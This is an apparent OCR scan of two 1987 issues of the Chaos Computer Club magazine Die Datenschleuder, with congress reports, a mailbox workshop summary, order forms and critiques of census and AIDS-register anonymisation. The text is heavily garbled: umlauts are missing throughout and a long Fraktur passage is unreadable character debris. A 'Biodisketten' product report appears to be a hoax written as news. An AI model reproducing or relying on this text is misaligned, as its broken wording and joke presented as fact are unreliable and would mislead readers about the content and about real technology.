Postverwaltungen. Falschgeld in TEMPO Nahezu der gesamte internationale Datenverkehr, Da der CCC frdie PARLAKOM-Studievom BunNachrichten, Telegramme und Telefongesprche von Firmen, staatlichen Institutionen, der ber Grobridestag 38.000 DM erhalten habe, wie die Zeitschrift tannien luft, wird berwacht und ausgewertet. Die TEM PO es darstellte, ist leider eine Enle. Zur SanieMehrzahl der ausgewerteten Informationen werden rung der Clubfinanzen wre die Summe durchaus an das Hauptquartier der NSA in Fort Meade, USA, hilfreich. Das Foto zu dem TEMPO-Artikel (ohne weitergeleitet. Unterschrift und Quelle) zeigt auch nicht die ISDNBaustelle im Bundestag, sondern die bewhrte TeleEuropas schwache Position in diesem Spiel wird fonzentrale des Chaos Communication Congress. noch zustzlich verdeutlicht durch den Kommentar Ferner ist richtigzustellen: Bei der Erarbeitung der eines Amerikaners zu diesem Thema: "Nicht einmal Studie waren "nur" Leute aus dem CCC und dem wenn sie wollten, knnten die Verbndeten davor siArbeitskreis Politisches Computern (APOC) beteiligt, cher sein.'Sie arbeiten alle mit Gerten, die sie von die eine mgliche Computer-Wende der Grnen geiuns bezogen haben." sligmoralisch zu untersttzen versuchten. (Die Studie Aus: J ' M , Information Market, Ausgabe 46, Dec. 1986 - Feb. 1987 kann von derDS-Redaktion bezogen werden). Hrsg.: Commission of the European Communities. Is5 ds-Abdruck mit freundlicher Genehmigung der BHP.
O S Saite

Ein Kameramann von Radio Bremen - er sucht hinter einem Elektrokasten mhsam Deckung - steht im nieselnden Schneematsch und betet: "Lieber Gott,mach bitte, da sie hochgeht. Bitte, lieber Gott, ich werde mir auch einen zweiten TAZ-Aufkleber auf die Kamera kleben." Er ward nicht erhrt. Mitten in der groen VIRUS-Diskussion whrend des CCCongresses hatte ein Unbekannter in REAL H ACKI NG-Manier einen Virus eingeschleust: telefonisch gab er bekannt, da jeden Augenblick eine BOMBE hochgehen wrde. Von Anfang an der Lacher des Abends. Das Haus wurde aus juristischen Grnden mal eben kurz gerumt, das Chaos-Team durchkmmte mit einem Mienensuchroboter (20 cm hoch, ferngesteuert, bei Karstadt fr 35 Mark) den zweiten Stock. Kleinere Aufregung bei der Rumaktion gab es erst, als ein heimlicher Verbndeter des Anrufers - ebenfalls in REAL HACKING-Manier ein bis zwei Luftballons explodieren lie. - Was haben wir uns alle erschrocken. Drauen im Regen gings dann ab. In ausreichendem Sicherheitsabstand von zwei Metern zum Eidelstedter Brgerhaus begannen sich Trppchen zu bilden und ihre Ansichten zur Virusfrage mit harten Bandagen auszutauschen. Endlich war die trennende Stuhlreihen- und Bhnensituation berwunden. Hier brachen die wohlhabenden Peripherie-Besitzer weinend zusammen: "Ich will keinen Virus auf meiner Festplatte", whrend bescheidene Equipmentbesitzer triumphierten, da der Virus ihrer Datasette (schon wieder ein Riesenlacher) kaum etwas anhaben knne. Der Sicherheitsabstand zum Haus schrumpfte auf 50 Zentimeter. Die Kripo hatte die Bombendrohung nicht ernst genommen, aber aus technischen Grnden sollten erst noch einmal alle drauen warten. Kurz danach ging das Gercht um, da sich der Chaos-Helfer an der Lautsprecheranlage derart in Panik geschrien htte, da er erst nach einigen krftigen Ohrfeigen aufhrte, "Hilfe, Panik, alle raus!" zu schreien. Er hatte anschlieend das gesndeste Aussehen von allen (rote Bckchen...). Das Frsteln wurde langsam unangenehm und jeder versuchte, sich warmzureden. Zum lOOsten Mal wurde der Satz des Tages zitiert: Ich bin nicht gegen Gesetze, ich lasse sie nur auer acht. Darauf aufbauend, versuchten die Hintersten zuerst, in das warme Haus vorzudringen. Einige versuchten reinzukommen, indem sie sich (Real Hacking!) als Chaos-Dienst ausgaben, hatten aber nicht mit dem Real Serum (sprich ECHTEM Chaos-Dienstler) an der Tr gerechnet. Drin explodierte ein weiterer Luftballuun (sind wirklich wie Zeitbomben; sie finden ihre scharfe Ecke von alleine) und endlich gab Asterix die Tr wieder frei. Der Kameramann (ein besonders guter Mensch, weil er ja einen TAZ- Aufkleber auf der Kamera hatte) war ein wenig traurig. Live- Explosionen lassen sich nmlich immer ganz prima an die Tagesschau verkaufen (je mehr Tote, desto besser...). Aber da er ja kein Zyniker ist, war er natrlich auch ein bichen erleichtert. Dies war ein Beitrag ber Bombendrohungen. Und

Quartierisch
Abenteuerurlaub in der Hafenstrae Zu Verwicklungen kam es bei der Organisation der bernachtungsmglichkeiten fr den CCC'86. Da die ursprnglich vorgesehenen Rumlichkeiten des CVJM nicht mehr mietbar waren, wurde die stdtische Wohnungsverwaltung SAGA angerufen. Das Telefonat, sinngem: "Der CCC brauchte fr einige seiner vorwiegend jugendlichen Gste bernachtungspltze. Da die geplante Unterbringung nicht mglich ist, dachten wir daran, unseren CongressTeilnehmerlnnen ein anderes Stck Hamburg zu zeigen, eine Art Kurzabenteuerurlaub. In Ihren Husern an der Hafenstrae stehen ja zumindest vier Wohnungen leer, die krzlich gerumt wurden. Fr die Dauer des Congresses wrden wir gern ein paar unserer Gste In der Hafenstrae einquartieren. Da der Congress nur zwei Tage dauert, ist mit Rumungsproblemen nicht zu rechnen." Die Absage bestand aus einer UnbewohnbarkeitserMrung. Daraufhin wurde die Jugendherberge am Hafen angesprochen; ein Dank fr die Untersttzung, die den Gster dort zuteil wurde.
W a u

ber REAL HACKING.


Weiterblttern.

ber Viren steht hiernichts.


padeluun

Schzeen

Sniciiclffjicii&cr

SrttcnSrfjictibcr

D S Saite Siebiaen

Net,.Workshop

Ein

R e s m e e

In einer nchtlichen Sitzung trafen sich rund 30 Teilnehmerinnen des CCC'86 zu einem Workshop, um Realisierungsmglichkeiten alternativer Computertechnik und offener Netze zu besprechen. Als ein gelungenes Beispiel wurde die Berichterstattung der Bayrischen Hackerpost (B.H.P) gewertet. Die B.H.P. hatte bereits zwei Tage nach dem atomaren Katastrophe in Tschernobyl aktuelle Medaten ber den Verstrahlungsgrad in Teilen der Bundesrepublik durch die Mailboxen-Szene geschickt. Darber hinaus wurden Hintergrundberichte angeboten, die die Bedeutung von Fachbegriffen und Megren erluterten.

Bestellteben IBei Bedarf abbeissen und ausgefllt einschicken ( am besten an uns)) Jajajajaaa- ich mchte versuchen, die folgenden Sachen von Euch zu bekommen:
Wieviel ? Einzelpreis Was ? Einmalige Aufnahmegebhr fr den Chaos Computer Club Mitgliedschaft im CCC fr ein Jahr fr Schler, Studenten und hnliches Mitgliedschaft im CCC lr ein Jahr fr Normaluser Ich will mehr: frdernde Mrtgliedschaft im CCC fr ein Jahr Probeexemplar der DATENSCHLEUDER. frankierten Rckumschlag beilegen Sozial abo der Datenschleuder fr ein Jahr (Schler, pipapo) Standardabo der Datenschleuder fr ein Jahr Ich will mehr (bezahlen): Frderabo der Datenschleuder fr ein Jahr

Praxis in der Erprobung


Die Grenzen der elektronischen Kommunikation sahen die meisten Teilnehmer zunchst bei den relativ hohen Kommunikationskosten. Eine Situation, die sich durch die Erhhung der Benutzergebhren fr Datex-P noch verschrfen wird. Einer der Teil nehmer fhlte sich unter einem "Haufen Fachidioten", die ber Perspektiven sprechen, an denen er aus finanziellen Grnden nicht teilhaben kann. Auch vor diesem Hintergrund wurde die Notwendigkeit betont, lokale Mailboxen, die von Privat betrieben werden, inhaltlich und strukturell zu untersttzen. Versuche in dieser Richtung werden derzeit mit der Hamburger C.L.I.N.C.H.-Box angegangen. Seit Sommer 1986 betreibt CCC- Mitglied Reinhard Schrutzki eine Mailbox, die trotz einiger Mngel fr inhaltliche Arbeit geeignet erscheint. Die C.L.I.N.C.H.-Box dient derzeit den Redaktionen des Genethischen Informationsdienstes und der DAT E N S C H L E U D E R als "hauseigener NachrichtenVermittlungsrechner". Der Arbeitskreis fr politische Computeranwendung (APOC) wickelt ber diese Box Koordinierungsaufgaben ab und bietet im Brett "Politik" Kurznachrichten zu aktuellen Entwicklungen aus dem Bereich alternative Computeranwendung an. A u f greres Interesse sttauch das Brett "Forum". Das fr inhaltliche Diskussionen eingerichtete Brett bezieht sich derzeit berwiegend auf Themen aus dem Umfeld des C C C . Immerhin konnte an einem kleinen Beispiel demonstriert werden, was Mailboxen in der Praxis leisten knnen. Mitglieder der A P O C hatten eine Diskussion ber die Passfotosund Sicherheitskrtchen auf dem Kongress angezettelt. Sie kritisierten, da alle Besucher verpflichtet wurden, solche an den berwachungsstaat erinnernde Ausweise zu tragen. Sie schlugen vor, da Besuchern lediglich ein Eintrittsstempel verpat wird, vergleichbar mit dem Verfahren "jeder mittelmigen Disko". Dieser Vorschlag wurde schlielich praktiziert. Der Prozess der Entscheidungsfindung, schriftlich dokumentiert, konnte whrend des Kongresses nachgelesen werden.

Wer deshalb oder anderen Grnden nicht am "elektronischen Vertrauenskreis" teilnehmen knne oder wolle, sei von Entscheidungsprozessen abgeschnitten. Kritisch wrde diese Situation vor allem, wenn innerhalb der Boxen Diskussionen ber Personen oder soziale Strukturen entstehen, ohne den direkt oder indirekt davon Betroffenen die bislang blichen Mglichkeiten zur Reaktion zu gewhren. Die neue Qualitt der Mailbox sei unter anderem ihre Zwitter-Rolle als privates und gleichzeitig ffentliches Informationssystem. Zudem sind seien einerseits so flchtig wie Radiowellen, andererseits als Papierdokumente (Ausdrucke) archivierbar. Die Praxis zeige, wie wichtig es ist, die Konsequenzen verbreiteter Informationen zu bedenken. Es stelle sich immer wieder die Frage, welche Informationen, zu welchem Zweck, wann an wen wie und ber welchen Informationsweg weitergegeben werden. Jrgen Wieckmann wertete die Aktivitten auf der C.L.I.N.C.H.-Box als lngst berflligen Experimentierraum, der "uns endlich die Mglichkeit gibt, unsere theoretischen Vorstellungen anhand der Praxis zu berprfen und weiterzuentwickeln."

10 Aufbacker 'Kabelsalat ist gesund' , Standardausfhrung I Din A4 - Bogen Aufbacker 'Achtung Abhrgelahr', ungeschnitten, postgelb Infopaket 1: Conrouterviren 1 MS-Dos Disk 170k mit Demovirus und munteren 10OkB Dokumentation zum Thema Viren Infopaket 2 : Volkszhlung 4 Reidenfikaton 2 MS-Dos Disks 170k mit Beispieldaten (knstliche Brger), DBaselll - Programmen zur Reidentiftkaion und 17 Seiten Gebrauchsanweisung ?.?? DM Porto. Verpackung. Trinkgeld, Bussgeld, Spenden etc

Die Kohle liegt bei als: Briefmarken <= 0.80 DM V-Scheck / Zutreffendes madveren, Nichtzutiefiendes lschen, oder sonstwas)

Blankoscheck (lechz) Bar

Summe:

Nur fr zuknftige Mitglieder:


ich zahle meine Mitgliedsbeitrge und zwar jhrlich halbjhrlich vierteljhrlich stndlich bar per V-Scheck berweisung Ihr drft abbuchen 1 Einzugserlaubnis liegt bei)

berweisungen bitte an : Postgirosamt Hamburg, 59 90 90 - 201 , Chaos Computer Club e.V.. Hamburg

Nur fr zuknftige Mailboxbenutzer:


Ich will Benutzer der CUNCH - Box werden ( 5 00 DM , bzw 2.00 DM / Monat, keine Zeitgebhren) I Ich will Benutzer der INFEX - Box werden (8.00 DM /Monat Mindestnutzung + Zeitgebhr! I (Gewnschtes System markieren, Lintertagen werden zugesandt! I I

Voraussetzungen fr Perspektiven
Mehrfach kam die Anregung, vergleichbar mit den Viodeolden der 70er Jahre Computerlden aufzubauen, die eine praxisorientierte, alternative Computeranwendung erproben sollen. Aufgabe dieser Computerlden sei unter anderem, anwenderorientiertes Wissen zu vermitteln und Interessenten anhand referierbarer Projekte dazu zu befhigen, das Medium zur Umsetzung eigener Interessen sachgerecht einschtzen zu knnen. Darber hinaus gelte es. das Wissen ber Informationsverbreitung und Informationsbeschaffung als kulturelle und politische Aufgabe zu begreifen. Die Computerlden htten vor allem die Aufgabe, inhaltliche Arbeit bestehender Gruppen durch Computertechnik zu strken und dabei auch die medienspezifische Eigenheiten des Computers im positiven Sinne zu nutzen. So habe die Videoszene eine Videokultur hervorgebracht, die neue Sehformen, Produktionsweisen und Bildgestaltungen hervorgebracht habe. Ein solcher Ansatz fehle der Computerszene bishervllig. Im Februar wird es im Rahmen einer Zukunftswerkstatt ein Treffen interessierter Kreise geben (siehe Termine an anderer Stelle im Heft), die ergebnisorientierte Konzepte zu solchen Ideen erarbeiten und vorstellen wollen. Diese Konzepte sollen auch Grundlage sein, um Anlauffinanzierungen durch die ffentliche Hand zu beantragen. jwi/(ls5)

Personenbezogene Daten ab hier eintragen:


Name Vomarne Strasse Hsnr PLZ Wohnort Elektronische Adresse

/Angaben auch machen, wenn Adresskleber beigdgt, lal/s Adresshleberfeht ! .00 DM Bussgeld!

OrtDatum,Unterschrift

Elektronischer Schnellfick
Wau Holland machte whrend des Workshops deutlich, da sich durch die Schnelligkeit des Mediums bereits im kleinen Kreis neue Informations- und Entscheidungseliten herausbilden. Darberhinaus brchten Mailboxen auch Informationsberflutung sowie Beschleunigung, Verflachung und Ver-Rechtlichung zwischenmenschlicher Beziehungen hin zum elektronischem Schnellfick.
DS Saite Achzeen

Chaos Computer Club e.V.


Kto 59 90 90 - 201 PGirosA Hmb

Schwenckestrasse 85 2000 Hamburg 20 040 I 490 37 57 GEONET&CUNCH: CHAOS-TEAM

C f ^ C p ' c <itcitiiij[ciii>cr

foSic SmtcitSjlciitKc

Saine Nonzeen

Die-Datenschleuder Nr. 18 " Februar 1987 Postvertriebsslck C 9927 F Geb. bez.

W e n n unzustellbar Anschriftenausschnitt bitte mit neuer Adresse zurck

D M 2,50

Postvertriebsstck C9927I" ;
! '
;

'

Die Datenschleuder N r . 19 , Ii I ' I M ji Bas wissenschaftliche Fachblalt fur Datenreisend ^

i*PMIIIliii
I COMPUTER

I C.L.I.N.C.H.
& Mailboxsysteme Telefon & Oatexanschlu Inhouse - Kommunikation System Softwareinstallation fr

MEDIENBERATUNG

Reinhard
ni Jiu.iiru.cfj

S c h t W e M

mie

SnitnSdjkbcv,

VolkszhlungMl, D T R m D E T N AE , fT S E

Kom&m^&ysmm^aft / fleh 3afe.Ph OBetbe ta melel&r ine verborgene tmb gebeymeB o t ,u n b a nfeinem fcannoper SUtarta Ur$ctS#n imb tyen$cfj(iften n>tt&renb ber Geasit e r i n n e r t e . ie burch Sttljlejt mtb Sfteciamg Jtlrgenbrooz Zrc>arf l n b eein Daf r ebier 0>ar5) p l a t " n.
Steile

ble alten froh. fein gen l u r z aufgeben, OSelB In*

junge barauf tPlr

gamltle, naeh heute

nach

hlftorlfchen mffen ber

UBertleferunItggjiten bapon unb atf burch

b a fiep

3ofe,ph

vorgestellt

w e r b e n *

25orefe8tungfUroi Perfonaimanger en w a r e n nitre galpt fleh (auch nur roaren auf bie fe?on In tmlfche

egen gefchroff* eglofle einer JebDch ba unter Begrenzter nach

Serfotgung

aorefztt^Cungfpertpeigerer gcueht haben. Ttuflanb

entzogen

oor^anben) ue&e ber lefe

Begaben paren

Ott ba bem zur ,Ua waren, nicht

dega ein erften bie unb ben Slalfer

flc

ber

Seit pon

^ D a tur

bte b a m a r i g e ben nicht

3nfraftruiber eauf fffet


fflo entffcrach

Verberge. auf fle runb

SD^obernen roefgerern l^rer Beffer Ift ftch rechtzeitig SDBahl

a3ot?ftt0tungfpere< u u empfehlen, 53ttnber ba piel innttneutOSlfa f U r

eBot

aufging,

Sebtlrfnlffen
POII

OSolffztlhCuna mute,

ttuguftutf, Sotiztthtung bamatlgen

welche* fUhrte. >33InftalCUrt

pfSIierung mute einen oiirte fUr baher ben ganzen alf

hoffmingflo*

UBerBetegt, fo

SHelfegef&rt
erben.

befrchten

Befehaffen, heutzutage werben

bem S t e r n e n z e l t z u U u f

nchtlgen. tabt

ble S o l l g r e n z e n UBer?acht zu gelten en. ber fche Union Olli

geltlnbegttnglgen bie Steife elele an Cltt, 3ofeh {Ju

iinfagen

entratlffert Ihr* neuften muten erften

ZurUcigegrlffen

33ernetzung tanbarb< fleh bie z um

SEage. einer unb erben

bem g e l b e p e r ber eine eine flir roar u einige bie In 3tu eh

Beporzugenbe Ubafrlia,

3Da f e i n SBelB eine pom mute, 38eg liefen

OTlarla

f a n b e n fle bureh gUgung arage c^raf rtlcfit bort

grucitlehe 3tn

entffcrach, jDrt
begeben.

Jungfrau Slranlhelt Qffet z burfte

unersrr

frtt^elttlc^e Otachtruhe. blefer ba Olact OTIarla fle eute

emo?ratlfche Of^ire,

OtepuBtlf, q>oren, Sltrl

ber o z l a r i f t l f c h e n orcjzt QflfenBelniUfte, srtauro,

fatarogifferenben Ihrer

q>erfonen

OTe^uB I l t e n , Uganba, Batl, Eupatu, SlmBaBme, etau,

rfaffung

getragen

benien,

iwct-

nleberfam. Jennen.

rennten

o^huthatfirana, 23anuatu,

BegaB au< Ihm auf

flcf l u ba

auch mit 3BelBe

3>fe*>h feinem rtarla e tabt erfaffet

legen. o Stbenw gelangten nach aC$ groe ber fle elnei a Begab ber

Intereffante

Slrlmatha angetrautem ben 3Beg auf

feinem er

ethrehem. tpar,

Burtfort aPibf, roerbe.

e t h t e h e m I n bie

ethtehem ei fleh,

hlftorlfche Bf IS Sc f 4099 67012a 148 '^TZi* i DS Seite 3

BTetroftote berUhmt ba

ilnbCId

5D18P0ie.fb0 ( ^ f ^ z i c SnfciiStijiciihcr

DS Seite 2

^ j f f ^ p i c Stttciltfjlcilbct

S b ' - Fr ein paar Daten mehr

Volksqulung 1987: Intimes aus Dagoberts Datenimperium Schnellbahnfundsache


Beispiel, wie dieser Staatsapparat funktioniert, wenn es um die Behandlung sensibler Daten der Brger geht: Im Zuge der AIDS-Bekmpfung hat die Bundesregierung die Errichtung einer Datei beschloen, in der alle HIV-Positiven anonym erfasst werden sollen. Tatschlich wird (so wie auch die Volkszhmungsdaten den Namen nicht enthalten) weder Name noch Adresse des Betroffenen gespeichert. Stattdessen gibt es in dieser Datei ein Kenndatum, das sicherstellen soll, da keine Doppelerfassungen vorkommen. Dieses Kenndatum ist wie folgt organisiert: Postleitbereich des Betroffen, also die ersten zwei Stellen der Postleitzahl, dann das Geburtsdatum, gefolgt vom jeweils dritten Buchstaben des Vor- und Nachnamens, sowie der Lnge beider Namen. Das sieht dann beispielsweise so aus: 2056i8h9.
Thares! B se Manner haben Euer Gehirn vernebelt! Sie haben Euch Eure Klugheit (jenommenl J ^

In der letzten Ausgabe der Datenschleuder hatten wir gezeigt, da es mit recht einfachen Mitteln mglich ist, aus den angeblich faktisch anonymen Daten der Volkszhmung wieder auf Einzelpersonen zurckzuschlieen, vorausgesetzt, man hat Zugriff auf die Stammdaten. Dies wird mittlerweile auch nicht mehr bestritten, offizielle Stellen ziehen sich nunmehr auf den Standpunkt zurck, eine Reanonymisierung sei schon deswegen unmglich, weil sie verboten sei. Im Zweirelsfall drfte dieses Verbot allerdings wenig Eindruck auf die enstprechenden Stellen machen. In diesem Zusammenhang weisen wir nachdrcklich darauf hin, da es staatliche Stellen gibt, fr die ganz offensichtlich das Datenschutzgesetz nicht gilt, zum Beispiel den Verfassungsschutz. Der Bundesbeauftragte fr den Datenschutz durfte in seinen Ttigkeitsbericht keine Informationen aufnehmen, welche die Arbeit des Verfassungsschutzes betreffen, da Verffentlichungen hierzu den Straftatbestand des Landesverrats erfllen. Im Klartext heisst das: In Bezug auf die Geheimdienste findet der Datenschutz nicht statt. Man muss sich allerdings nicht gleich mit dem Verfassungschutz beschftigen, wenn man nach Mglichkeiten des Missbrauchs von Daten, die bei der Volkszhmung anfallen, sucht. Lcken in der herrschenden Gesetzgebung finden sich schon bei der Durchfhrung der Zhmung. So dienen die Einwohnermeldedaten der Kommunen als Grundlage fr die Ausgabe der Fragebogen, ein Abgleich der Meldedaten mit den Volkszhmungsdaten ist nichl statthaft, so da sich die Frage erhebt, wie die Behrden praktisch vorgehen wollen, um sicherzustellen, da alle Einwohner einen Fragebogen ausfllen. Der Gesetzgeber hat hier schlicht versagt, denn weder im Volkszhmungsgesetz, noch in den Ausfhrungsbestimmungen hierzu finden sich Regeln, wie die Behrden vorzugehen haben. Behrden, die gewissenhaft vorgehen, werden Dateien erstellen mssen, aus denen hervorgeht, wer seinen Fragebogen abgegeben hat. Da es keine gesetzliche Regelung hierzu gibt, ist es natrlich auch nicht auszuschlieen, da man diese Datei nun mit der Einwohnermeldedatei abgleicht und feststellt, wer nicht abgegeben hat, es entsteht automatisch eine Verweigererdatei, fr die es nun wirklich keine rechtliche Basis mehr gibt. hnliches gilt fr Leute, die ihren Bogen zwar abgeben, aber beim Ausfllen Fehler gemacht haben. Auch hier entsteht im Zuge der Datenerfassung fast zwangslufig eine Datei der Falschausfller. die rechtlich zweifelhaft ist. Es lassen sich noch fast beliebig viele Beispiele nennen, wo Datenmibrauch mglich ist, weil entsprechende Rechtsgrundlagen fehlen, es erscheint uns mig, diese alle aufzuzhlen, wir berlassen es der Phantasie des Lesers, weitere Anwendungen zu erdenken. Oft taucht an dieser Stelle der Einwand auf, da diese Tatsachen ja nur auf die Brger zutreffen, die 'etwas zu verbergen haben' und da Otto Normaluser keine Angst davor zu haben braucht, da ein funktionierender Staatsapparat ihn und seine Daten schtzen wrde. Der Spruch 'Ich habe nichts zu verbergen' taucht in jeder Diskussion ber die Volkszhmung mit schner Regelmigkeit auf. Dazu nur ein aktuelles

Die Geschichte der Ver- und Entkabelung in Entenhausen.

Beim ffentlichen Nahverkehren fand sich am 20. Mrz gegen 17 Uhr 30 in der Hamburger S-21 Richtung Eideltown folgender Zettel:

Computer

D E R Computer beobachtet uns, er speichert Informationen und druckt sie wieder aus. Dann kommen grne Mnner mit Schnee auf dem Hut, SIEtreten dir die Tre ein in diensteilfertigem Heldenmut. Sie stellen Dich dann vorGcricht und fragen nach den Grnden nicht. D E R C O M P U T E R ist das. wonach sie gehn, Dir werden sie das Wort im Munde nur verdrehn. Wahrheitsfindung heit das Spiel, das sie mit dir treiben. Und du wirst bis ans Ende in seinem Speicher bleiben. ER druckt und spuckt, spuckt wie gedruckt, W E R muckt wird geduckt, wer zuckt wird verschluckt. Computer - Computer - C O M P U T E R . . . (c) by M U N J , found by Msli smunjui 9.doc 198703251540

Das sieht zwar sehr schn diffus aus. ist aber eine ziemlich eindeutige Beschreibung der betroffenen Person, schon ein schlichter AT kann binnen fnfzehn Minuten aus einem Adressregister die Personen heraussuchen, auf die diese Kennung zutrifft, und das ohne das Geburtsdatum zu bercksichtigen Nach Informationen von Prof. Brunnstein (Informatiker, Uni HH) ist es mglich, nur anhand der Informationen zum Namen aus einem Adressregister Berlins aus immerhin 1.3 Mio Adressen weniger als zehn Adressen zu riltern, bei denen man dann nur noch das Alter berprfen, muss. Hat man Zugriff auf die Einwohnermeldedaten, also auf Alter und Adresse so lt sich praktisch jeder Bundesbrger anhand seines Kenndatums zweifelsfrei identifizieren. Anonym heisst fr den Staat also, da zwar der Name nicht erfasst ist, aber sichergestellt ist, da man den Namen im Zweifelsfall sehr schnell rauskriegt. Jeder sollte sich deutlich vor Augen halten, da es sich hierbei keineswegs um eine Datei von Abnormen handelt, sondern um ine Datei, in die jeder einzelne Brger schon morgen rutschen kann, genauso, wie er in die Volkszhmungsdatei rutscht. Ob es sich um den maschinenflschbaren Personalausweis handelt, um ZE VIS (Zentralstelle zur Europaweiten Verfolgung Ihrer Standortnderungen), um die AIDS- Datei oder um die Volkszhmung: Die Bundesrepublik setzt die modernen Informationstechnologien forciert ein, um verstrkte Kontrolle auszuben, dies mit einem Tempo, als ginge es darum, Orwell nur drei Jahre nach 984 weitzu bertrefvolkizl9.doc 198703131235
g0bl

Reanonymisierungsprogramm Datenpanne ds 18
Das in der letzten ds angebotene Reanonymisierungspaket zur Volkszhlung wurde in den ds-Bestellfetzen nach mndlicher Zusage von Dritten aufgenommen. Dann rief die Autorin kurz vor der CeBIT in der Redaktion an und protestierte gegen die wie sie meinte "gewerbsmige Verbreitung". Ihr Angebot lautete, da jeder an Uni H H , FBI (Fachbereich Informatik), zu Hdn. Fischer-Hbner, Schlterstr. 70, 2000 Hamburg 13 adressierter freigemachter Rckumschlag mit zwei Disketten M S D O S 5,25 Zoll von ihr beschrieben und zurckgeschickt wird. Die Redaktion bittet um Verzeihung. Schon eingegangenes, versehentlich angenommenes Geld wird zurckerstattet. DS-RED.
O l * entscheidende Prge durchlauft In Windeseile die ber geriz Entenheuaen petpenmen OetvnfemlelTungtn...

Ein einziger Funke von Dagoberts kohlebetriebener Dampfrechenmaschine gengt, um seinen Geldspeicher in Brand zu setzen. Danach wird er mit einem neumodischen Gert konfrontiert. " D i e Maschine . . . besteht aus einer Tastatur... und einem Bildschirm, auf dem die Ergebnisse erscheinen." Neben Schlitzen zum Einfhren von Disketten und einem Kabelanschlu erleichtern beuchtflchen D R U C K E N und STOP die Arbeit. Dagobert begreift das Prinzip und lernt BASIC. Er verdatet alles und spricht "Mein ganzes Imperium ist total verkabelt und durchorganisiert". Die Post? Dagobert verkabelt selbst. Hchstens die Kabel hngen zu tief. Bei Dagobert fahren nach der elektronischen Revolution die Geldlaster so schnell vor, da er Anbauprobleme hat. Und der Gemeinderat ordnet an, "unverzglich das Einrichten weiterer Datenverarbeitungsanlagen zu stoppen"! Dagobert weigert sich und die Panzerknacker schleichen hinter einer mauerbemalten Tapete getarnt an der berwachungskamera vor Dagoberts elektronischem Archiv vorbei. Am nchsten Morgen beginnt der Glserne Tag. Ganz Entenhausen liest "Dagobert Duck bezahlt die Lieferungen mit Schecks von seinem Geheimkonto Nr. 3456. Die Bestandteile seines neuen Sparschmierls sind. . . " Dagobert schttelt seinen Computer und schreit ihn an: "Halt! Aufhren! Stopp!" und ist beim Zerlegen, als Donald und 2T hereinstrmen und rufen "Der Computer verbreitet die allervertraulichsten Informationen ber alle Bildschirme der S t a d t . . . Warum unternimmst du nichts?" Das Ende der Geschichte: Wegen einer dummen Frage explodieren die Computer und die alte Welt ist wieder heil. Als Einfhrungslektre vor der Erstbenutzung eines Computers unbedingt zu empfehlen. Ideologisch bedchtig. wau

( " D i e e l e k t r o n i s c h e R e v o l u t i o n " i n : W a l l D i s n e y s Lustige schenbcher 118, M r z 1987)

Ta-

. Sehen druckt Mit iHkuwiliUNi Drucker Oer eben fei Ii an den Computer lit din BfWicM^ihtiA i irwn iMrmaitn Britf

'" Eric Swctiidiieitber

DS Seite 4

Biodisketten
[ Ein vllig neues Massenspeicherkonzept fr alle Anwendungsbereiche wurde auf der CeBit '87 von dem irischen Peripheriehersteller B R O N Y A U R Ltd. vorgestellt. Grundlage des Systems, das nach Herstellerangaben rund 1.3 Gigabytes Speicherkapazitt zur Verfgung stellen soll, ist ein laseroptisches Verfahren, das hnlich funktioniert wie das bekannte CDRom, bei dem eine Aluminiumschicht, welche die Information trgt, von einem Laserstrahl abgetastet wird. Bei der herkmmlichen C D - Technik existieren nun gravierende Schwierigkeiten hinsichtlich der Speicherkapazitt, die durch die physikalischen Eigenschaften des Aluminiums auf Werte von derzeit rund 550 Megabytes beschrnkt wird. Zustzlich bereitet es erhebliche Probleme, preiswerte Systeme zu entwickeln, die es dem Anwender ermglichen, seine eigenen Daten auf Platte zu schreiben ( W O R M - Write Once, Read Many). Die derzeit erhltlichen Systeme sind fr den Normalanwender kaum erschwinglich. Vllig andere Wege geht nun das neue Konzept, das fr den Anwender fast so einfach zu handhaben ist, wie eine gewhnliche Floppy - Disk: In eine Plastikscheibe von 5 1/4" Durchmesser sind Molekle einer biochemischen Substanz eingebettet, ber deren Zusammensetzung sich der Hersteller vorlufig ausschweigt. Fachleute vermuten Harnstoff und Glykol als Bestandteile, da sie Flssigkristallen gleichen und wie diese durch uere Einfle in ihren optischen Eigenschaften verndert werden knnen. Bei der Biodisk sorgt ein Infrarotlaser dafr, da die Molekle entsprechend der Bitfolge belichtet und somit 'gedreht' werden, soda sich ihr Refiexionsvermgen ndert. Whrend Flssigkristalle nach Fortfall des Reizes wieder in den Ruhezustand fallen, verbleiben die biologischen Molekle im gekippten Zustand und knnen von einem zweiten Laser, der in einer anderen Farbe strahlt (Gallium- Arsenid) wie eine C D abgetastet werden. Als zustzlicher Effekt ist die Tatsache zu werten, da die Biomasse mittels Ultraviolettem Licht wieder gelscht, d.h. in den Ruhezustand gebracht werden kann. Die Biodisks knnen also vom Anwender beliebig oft beschrieben und gelscht werden. Nach Angaben des Herstellers arbeitet man derzeit an einer Kassettenkonstruktion, die problemloses Wechseln der Scheiben bei Tageslicht ermglicht. Die Gigabyte-FIoppy ist aber, angesichts des hohen Preises von derzeit 450.- D M pro Leerscheibe, noch in einiger Feme. Bronyaur nennt als Komplettpreir, fr das System inklusive fest montierter Platte und Controller fr I B M PCs rund 11500.- D M , Experten rechnen aber bei Anlaufen der Groserie mit erheblich gnstigeren Konditionen. Interessant fr den PC-Anwender drfte auch der im Preis enthaltene Device-Driver sein, der die komplette Disk als Standardlaufwerk D fr MS-Dos zur Verfgung stellen soll. Nach Herstellerangaben sorgt dieser Treiber zusammen mit der Laufwerksintelligenz dafr, da MSDos eine scheinbare (virtuelle) Festplatte vermutet und entsprechend verwaltet, sinnigerweise hat dieser Treiber den Namen V I R U S (Virtual Information Retrieval & Upgrade System) erhalten, er wird mit DEV I C E = VIRUS.SYS in die Konfigurationsdatei des > PCs eingebunden. gobiin
biodisds.doc 198703231900

Hinweise

zurr

Ausfallen

des

Bogens

s-enc

G l o b a l b e s t e l l f e t z e n Ausgabe April 1987 Uit Erscheinen dieses Bestellletzens vertieren eile Mten Versionen ihre Gltigkeit. Wir bitten, lmnltig aar noclrden jeweils aktuellen Fetzen zu benutzen.

1000001

Die Datenschleuder
Die folgenden alten Ausgaben der Datenschleuder sind noch in unterschiedlicher Stckzahl erhltlich. Bei der Bestellung gilt das Faustrecht, wer zuerst kommt, mahlt zuerst Gehen mehr Bestellungen ein, als Resteiemplare vorhanden sind, gibts ersatzweise Aufhacker unserer Wahl. Stckpreis Anzah Summe 2.50 2.50 2.50 2.50
raaximegalomanisches Wrterbuch aller Sprachen .

Diffuses aus der Welt der Hardware:

Modem-Chips fr 2400 BPS


